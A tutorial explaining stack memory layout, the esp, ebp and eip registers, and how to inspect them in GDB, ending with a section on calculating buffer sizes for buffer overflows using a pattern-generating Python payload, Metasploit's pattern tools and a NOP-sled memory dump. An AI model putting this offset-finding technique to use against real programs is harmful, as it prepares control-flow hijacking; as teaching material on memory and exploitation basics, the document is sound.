How the Stack works

André Eichhofer

The stack is a part of the Random Access Memory (RAM) where local variables are stored. When the operating system runs a program, the executable is loaded into memory. The program's memory is divided into different areas and looks like the following:

              ┌─────────────────┐
  0xFFFFFFFF  │                 │
              │                 │
              │     Kernel      │
              │                 │
              │                 │
              ├─────────────────┤
              │                 │
              │                 │
              │      Stack      │
              │                 │
              │                 │
              ├─────────────────┤
              │                 │
              │                 │
              │      Heap       │
              │                 │
              │                 │
              ├─────────────────┤
              │                 │
              │      Data       │
              │                 │
              ├─────────────────┤
              │                 │
              │      Text       │
  0x00000000  │                 │
              └─────────────────┘

Kernel: memory reserved for the operating system kernel. Command line parameters and environment variables passed to the program are stored just below it, at the top of the stack
Text: contains the actual code of the program. The text area is read-only, because the code must not be changed
Data: contains initialized and uninitialized global and static variables
Heap: contains dynamically allocated memory, for example large objects (images, files etc.)
Stack: holds the local variables of each function of the program. The stack is writable, as the variables may change

When a function is called, its parameters and local variables are pushed onto the top of the stack. Since the stack grows downward, every item pushed onto the stack makes it grow towards the low memory addresses. For example, if a program calls a function, the parameters of the function are pushed onto the stack, so the top of the stack moves to a lower address.
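
The downward growth can be illustrated with a toy model. This is only a sketch and does not touch real memory: the class name ToyStack, the starting address and the pushed values are assumptions made up for the illustration.

```python
# Toy model of a downward-growing stack (illustration only, not real memory).
WORD = 4  # bytes per stack slot on a 32-bit system


class ToyStack:
    def __init__(self, top_address):
        self.sp = top_address   # stack pointer: address of the most recent item
        self.memory = {}        # address -> value

    def push(self, value):
        self.sp -= WORD         # growing the stack lowers the address
        self.memory[self.sp] = value
        return self.sp

    def pop(self):
        value = self.memory.pop(self.sp)
        self.sp += WORD         # shrinking the stack raises the address
        return value


stack = ToyStack(0xBFFFF000)    # hypothetical starting address
first = stack.push("argument 2")
second = stack.push("argument 1")
print(hex(first), hex(second))  # the second push lands at the lower address
```

Each push lowers the stack pointer by one word, so the item pushed last always sits at the lowest address.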

Structure of the stack

The stack is managed with several registers that point to locations inside it. To simplify, the diagram is turned upside down, which means that the higher memory addresses are at the bottom.

                   ┌───────────────────────────┐               
       0x00000000  │                           │               
                   │  extended stack pointer   │               
                   │                           │               
                   ├───────────────────────────┤               
               ▲   │                           │   │           
               │   │                           │   │           
               │   │                           │   │           
               │   │                           │   │           
               │   │          Buffer           │   │           
               │   │                           │   │           
               │   │                           │   │           
               │   │                           │   │           
 stack growth  │   │                           │   │  memory   
               │   ├───────────────────────────┤   │           
               │   │                           │   │           
               │   │   extended base pointer   │   │           
               │   │                           │   │           
               │   ├───────────────────────────┤   │           
               │   │                           │   │           
               │   │    instruction pointer    │   │           
               │   │                           │   ▼           
                   ├───────────────────────────┤               
                   │                           │               
                   │       parent stack        │               
                   │                           │               
      0xFFFFFFFF   └───────────────────────────┘

The contents of the registers change while the program runs, and each register points to a specific address in memory.

The (extended) stack pointer (esp) points to the top of the stack. It is followed by the buffer, which holds the contents of the variables (or parameters) of a specific function of the program. The function must allocate the size of the buffer. The address in the esp register changes constantly.
The (extended) instruction pointer (eip) points to the next instruction the program is about to execute. When a function is called, its value is saved on the stack as the return address.
The (extended) base pointer (ebp) stays the same while a function is running. That means that we can use the base pointer as an anchor to find parameters and local variables.

Note that the names of the registers depend on the system. On 64-bit systems the registers are called rsp, rip, rbp, etc.

Examining the stack

Compile a C file, load it in GDB and disassemble a function. The output is something like

(gdb) disas func
0x00000305 <+0> push %ebp
...
...

Examining addresses in the stack

0x00000305 is the address of the instruction, written in base 16 (hexadecimal). This is where the instruction lives in memory. Note that the address consists of 8 hexadecimal digits. Each digit encodes 4 bits, so the address is 32 bits wide. In GDB, a word is 4 bytes (1 byte = 8 bits), so an address is one word: 4 bytes = 32 bits. That’s why it’s called a 32-bit architecture. Registers are also 32 bits wide.
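
The arithmetic behind the address width can be checked in a few lines. This is a small sketch; the variable names are chosen only for the illustration.

```python
address = "0x00000305"

hex_digits = len(address) - 2   # drop the "0x" prefix
bits = hex_digits * 4           # one hexadecimal digit encodes 4 bits
size_in_bytes = bits // 8       # 8 bits per byte

print(hex_digits, bits, size_in_bytes)
```

The same calculation on a 16-digit address gives 64 bits, or 8 bytes.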

In 64-bit systems the address may look like

0x0000000000000305 <+0> push %rbp
...

If the program has not been run yet, the registers are empty, and if you try to inspect them you get the error No registers.

Run the program to get the registers filled.

Examine registers in the stack

To examine registers it might be necessary to set a breakpoint first. List the function with

disas/s {name of function}

and set the breakpoint at the specific line

Example: b 9

To get an overview of the current frame

info frame

You can examine any register in the stack by the following commands:

info registers: overview of registers
info registers {register}: show specific register

You can print the contents of the memory a register points to with:

x/{number of units}{format} {register / address}
- number of units: how many units to print
- format: x (hexadecimal), s (string)
- register: a register (e.g. $rsp) or a memory address

If you type

x/12x $esp

GDB will print 12 words of memory, starting at the address held in the stack pointer register, and the output will be something like this

(gdb) x /12x $esp
0x2fc0: 0x00000000  0x00000000  0x00000000  0x00000000
0x2fd0: 0x00000000  0x00000000  0x00000000  0x00000000
0x2fe0: 0x00000000  0x00003fb8  0xffffffff  0x00000001

Note that GDB prints four words per row. The address at the start of a row belongs to the first word, and each following column is 4 bytes further on. Written out with one word per line, the same output would look like this:

0x2fc0: 0x00000000
0x2fc4: 0x00000000
0x2fc8: 0x00000000
...
0x2fe4: 0x00003fb8
0x2fe8: 0xffffffff
0x2fec: 0x00000001

To print the memory as strings instead, use the command:

(gdb) x/12s $esp

which prints the content of the memory as strings, one string per line.

Each column represents 1 word. Each word is 4 bytes (or 32 bits).

(gdb) x /12x $esp
0x2fc0: 0x00000000  0x00000000 
            |            |
            V            V
         1 Word       1 Word
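
To see which address belongs to which word, the rows of the x/12x output above can be expanded in a short script. This is a sketch that assumes GDB's default word size of 4 bytes; the helper name word_addresses is made up for the illustration.

```python
WORD = 4  # GDB's default unit for x/x is a 4-byte word

# Rows copied from the x/12x output above: (row address, words in that row)
rows = [
    (0x2fc0, [0x00000000, 0x00000000, 0x00000000, 0x00000000]),
    (0x2fd0, [0x00000000, 0x00000000, 0x00000000, 0x00000000]),
    (0x2fe0, [0x00000000, 0x00003fb8, 0xffffffff, 0x00000001]),
]


def word_addresses(rows):
    """Return a list of (address, word) pairs, one per word in the dump."""
    pairs = []
    for row_address, words in rows:
        for column, word in enumerate(words):
            # Each column is one word (4 bytes) further than the previous one.
            pairs.append((row_address + column * WORD, word))
    return pairs


for address, word in word_addresses(rows):
    print(f"{address:#06x}: {word:#010x}")
```

The value 0x00003fb8, for example, sits in the second column of the row starting at 0x2fe0, so its address is 0x2fe4.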

Examine (extended) stack pointer

Get content of the stack

The (extended) stack pointer is a register that always points to the top of the stack. The stack pointer is labeled

$esp in 32-bit architecture and
$rsp in 64-bit architecture

Get the address held in the stack pointer with

info frame
info registers
info registers {$rsp} / {$esp}

Get the content of the memory at the stack pointer with

x /{number of units}{format} $esp / $rsp

Examples:

x /100x $rsp: list 100 words, starting at the stack pointer, in hex format
x /100s $rsp: list 100 strings, starting at the stack pointer

Find variables in the stack

To find the content of variables in the stack, type

info args

and the output could be something like

variable = 0x7fffffffe6a4        "content"
                 |                   |
                 V                   V
         address of variable   content of variable

It’s possible that the address of the variable - 0x7fffffffe6a4 - lies far beyond the base pointer and seems to be outside the stack of the current frame. However, the stack may contain a pointer to that address:

(gdb) x /100x $rsp
0x7fffffffe2a0: 0xffffffff   0x00000000 0xffffe6a4 <–– address of variable

If you print the stack in string format you see the content of the address the stack points to

(gdb) x /100s $rsp
0x7fffffffe2a8: "\244\346\377\377\377\177"
0x7fffffffe2af: ""
0x7fffffffe2b0: "content" <–– content of 0x7fffffffe6a4

Examining (extended) base pointer

The (extended) base pointer is a register that always points to the base of the current stack frame. Because the stack grows downwards, the base pointer holds a higher memory address than the stack pointer. In GDB it is labeled as

$ebp in 32-bit architecture and
$rbp in 64-bit architecture.

Unlike the stack pointer, the base pointer stays at the same address while a function is running. That means that all local variables and parameters are at a fixed offset from the base pointer, even as the stack pointer moves with push and pop.
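
The relationship between the two registers can be traced with plain arithmetic. The following is a sketch of a typical 32-bit function prologue, not the output of a real program: the starting address and the 16 bytes reserved for locals are assumptions, and the exact position of local variables depends on the compiler.

```python
WORD = 4  # 32-bit system

# Hypothetical stack pointer at function entry; it points at the return address.
esp = 0xBFFFF010

# Typical prologue: push %ebp ; mov %esp,%ebp ; sub $16,%esp
esp -= WORD              # push %ebp stores the caller's base pointer
ebp = esp                # mov %esp,%ebp anchors the new frame
esp -= 16                # sub $16,%esp reserves room for local variables

return_address_slot = ebp + WORD   # saved return address, just above saved ebp
first_local_slot = ebp - WORD      # locals sit below the base pointer

esp_before_push = esp
esp -= WORD              # a later push moves the stack pointer ...
print(hex(ebp), hex(esp))          # ... while the base pointer is unchanged
print(hex(return_address_slot), hex(first_local_slot))
```

The offsets ebp + 4 and ebp - 4 stay valid for the whole function, no matter how often esp changes.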

Get the address of the base pointer with

info frame
info registers
info registers {$rbp} / {$ebp}

Get the content of the base pointer with

x /{format} $rbp / $ebp

Examples:
¯¯¯¯¯¯¯¯¯¯¯¯¯

Get memory address of $rbp

(gdb) info frame
rbp at 0x7fffffffe320

Example: Find $rbp in the stack
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

(gdb) x /100x $rsp
...
...
0x7fffffffe320: 0xffffe340   0x00007fff 0x00400593  0x00000000
       |             |
       V             V
      $rbp       points to higher memory address
...

Get content of $rbp

(gdb) x /x 0x7fffffffe320
0x7fffffffe320: 0xffffe340 <–– $rbp points to 0xffffe340

Examine (extended) instruction pointer

The instruction pointer is a register that points to the next instruction to be executed. In GDB it is labeled as

$eip in 32-bit architecture and
$rip in 64-bit architecture.

On the stack, the saved instruction pointer (the return address) is situated at a slightly higher memory address than the saved base pointer. It is always located

4 bytes above the base pointer in 32-bit systems
8 bytes above the base pointer in 64-bit systems

Get the address of the instruction pointer with

info frame
info registers
info registers {$eip} / {$rip}

As the saved instruction pointer is located at a fixed offset from the base pointer, you can find it with

x /x $ebp+4 in 32-bit systems
x /x $rbp+8 in 64-bit systems

Example:
¯¯¯¯¯¯¯¯¯¯¯¯¯

(gdb) x /100x $rsp
...
...
0x7fffffffe310: 0xf7de3b40 0x00007fff   0x00000000 0x00000000
0x7fffffffe320: 0xffffe340 0x00007fff   0x00400593 0x00000000
...                 |                      |
...                 V                      V
               base pointer         instruction pointer

In the example the base pointer is located at the memory address 0x7fffffffe320 and points to the memory address 0x00007fffffffe340 (shown as the two words 0xffffe340 and 0x00007fff). The saved instruction pointer is exactly 8 bytes above the rbp, at the address 0x7fffffffe328, and it holds the return address 0x00400593.
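
On a 64-bit system each saved register spans two of the 32-bit words that x /100x prints. The following sketch reassembles the row from the dump above with Python's struct module; the variable names are chosen for the illustration.

```python
import struct

# Row copied from the dump above: four 32-bit words starting at 0x7fffffffe320
row_address = 0x7fffffffe320
words = [0xffffe340, 0x00007fff, 0x00400593, 0x00000000]

# Repack the words as raw little-endian bytes, then read them as 64-bit values.
raw = struct.pack("<4I", *words)
saved_rbp, return_address = struct.unpack("<2Q", raw)

print(hex(saved_rbp))         # value stored at $rbp
print(hex(return_address))    # value stored at $rbp + 8
print(hex(row_address + 8))   # address of the saved return address
```

Because the words are stored in little endian, the second word of each pair forms the upper half of the 64-bit value.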

https://oskarth.com/unix02/

Calculating the buffer size

When testing buffer overflows it’s necessary to calculate the buffer size in order to adjust the size of the payload. You can calculate the distance from the beginning of the buffer to the instruction pointer or to any function pointer.

Method 1: Calculate the buffer size manually

To calculate the buffer size you need to build a payload that ends in a unique string and then find part of that string in the stack.

We create a payload with

350 * letter A and
100 * digits (the two-digit numbers 00 to 49)

==> 450 bytes

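#!/usr/bin/env python3

# 350 filler bytes
attack = 'A' * 350

# Append the two-digit numbers 00 to 49 as a recognizable marker (100 bytes)
for i in range(0, 5):
   for j in range(0, 10):
      attack += str(i) + str(j)

print(attack)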

Make a payload from the python script with

./calculation_payload > calculation

Open the program with gdb and execute it with the payload

(gdb) run < calculation

Print the stack and notice the value of rip

0x7fffffffe400: 0x32343134 0x34343334 0x38333733 0x30343933
                                           |          |
                                           V          V
                                       Instruction Pointer

Here, the saved $rip is at 0x7fffffffe408 and it contains the values
0x38333733 and 0x30343933.

You need to convert the hex values to ASCII and then reverse them, because they are stored in little endian:

38333733 = 8373 => 3738
30343933 = 0493 => 3940
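
The conversion can also be done with Python's struct module. This is a small sketch; the helper name word_to_ascii is made up for the illustration.

```python
import struct


def word_to_ascii(word):
    """Decode a 32-bit word from a GDB dump into the 4 characters stored in memory."""
    # Packing as little endian restores the byte order found in memory.
    return struct.pack("<I", word).decode("ascii")


print(word_to_ascii(0x38333733))
print(word_to_ascii(0x30343933))
```

Packing the word as little endian performs the reversal, so no manual swapping of the characters is needed.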

Find the numbers in the payload:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0001020304050607080910111213141516171819202122232425262728293031
3233343536|37383940|414243444546474849
              |
              V
      Ascii value from $rip

Count the A characters

= 350

plus the digits before 37383940

= 74

Total: 424 characters ==> 424 bytes from the start of the buffer to the instruction pointer
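
Instead of counting by hand, the position can be looked up with a string search. The sketch below rebuilds the payload in the same way as the script above and searches for the characters recovered from $rip; the variable names are chosen for the illustration.

```python
# Rebuild the payload: 350 filler characters plus the numbers 00 to 49.
payload = "A" * 350
for i in range(0, 5):
    for j in range(0, 10):
        payload += str(i) + str(j)

marker = "37383940"             # characters recovered from $rip
offset = payload.find(marker)   # index of the first character that lands in $rip

print(len(payload), offset)
```

The search returns the index of the first character of the marker, which equals the number of bytes that precede the instruction pointer.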

Method 2: Use pattern create and pattern offset

The method above can be automated with the scripts pattern_create and pattern_offset from the Metasploit Framework.
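
The idea behind these scripts can be sketched in Python. This is not the Metasploit implementation: the two functions below are hypothetical stand-ins that only mimic the well-known Aa0Aa1Aa2... pattern, and the word used in the lookup is taken from the pattern itself to simulate a value found in $rip.

```python
import string


def pattern_create(length):
    """Build a pattern such as 'Aa0Aa1Aa2...' with the given length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, word):
    """Return the offset of a 32-bit dump word inside the pattern, or -1."""
    needle = word.to_bytes(4, "little").decode("ascii")
    return pattern.find(needle)


pattern = pattern_create(450)
# Simulate a crash: pretend these 4 pattern bytes were found in $rip.
word = int.from_bytes(pattern[424:428].encode("ascii"), "little")
print(pattern_offset(pattern, word))
```

Because every short slice of the pattern is distinct, a single word read from the instruction pointer is enough to recover the offset.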

Method 3: Subtract the memory addresses in GDB

In GDB you can subtract memory addresses to get the length of the buffer.

(gdb) x /100x $rsp
0x7fffffffe220: 0xffffffff 0x00000000 0xffffe62c 0x00007fff
0x7fffffffe230: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe240: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe250: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe260: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe270: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe280: 0x90909090 0x90909090 0xcccccccc 0xcccccccc
0x7fffffffe290: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x7fffffffe2a0: 0xcccccccc 0xcccccccc 0x41414141 0x41414141
                                           |          |
                                           V          V
                                       instruction pointer

In the example above, assume that the buffer begins at the address

0x7fffffffe230

and the instruction pointer is at the address

0x7fffffffe2a8.

As the stack grows downwards, the address 0x7fffffffe2a8 is greater than 0x7fffffffe230. With GDB you can subtract the addresses with

(gdb) p/d 0x7fffffffe2a8 - 0x7fffffffe230
$1 = 120

So, the buffer size is 120 bytes.
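
The same subtraction can be cross-checked against the dump above. In this sketch the addresses where the 0x90 and 0xcc bytes start are read off the dump, and the variable names are chosen for the illustration.

```python
buffer_start = 0x7fffffffe230          # first 0x90 byte in the dump
cc_start = 0x7fffffffe288              # first 0xcc byte in the dump
return_address_slot = 0x7fffffffe2a8   # first 0x41 byte (instruction pointer)

offset = return_address_slot - buffer_start
nop_bytes = cc_start - buffer_start
cc_bytes = return_address_slot - cc_start

print(offset, nop_bytes, cc_bytes)
```

The two segments visible in the dump add up to the same distance that GDB calculated.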

https://0xrick.github.io/binary-exploitation/bof5/